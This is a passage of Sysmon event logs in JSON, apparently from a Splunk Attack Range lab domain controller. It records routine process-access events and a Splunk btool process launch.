ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3797,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3798,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3799,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3800,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3801,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-0010BEA10500}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-0010BEA10500}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3802,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.250\r\nProcessGuid: {E2A3D6B1-1106-5F25-0000-00107EA20500}\r\nProcessId: 4836\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1106-5F25-0000-0010BEA10500}\r\nParentProcessId: 5008\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.250","ProcessGuid":"{E2A3D6B1-1106-5F25-0000-00107EA20500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1106-5F25-0000-0010BEA10500}","ParentProcessId":"5008","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3803,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1106-5F25-0000-0010BEA10500}\r\nSourceProcessId: 5008\r\nSourceThreadId: 5016\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00107EA20500}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1106-5F25-0000-0010BEA10500}","SourceProcessId":"5008","SourceThreadId":"5016","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00107EA20500}","TargetProcessId":"4836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3804,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00107EA20500}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.246","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00107EA20500}","TargetProcessId":"4836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3805,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 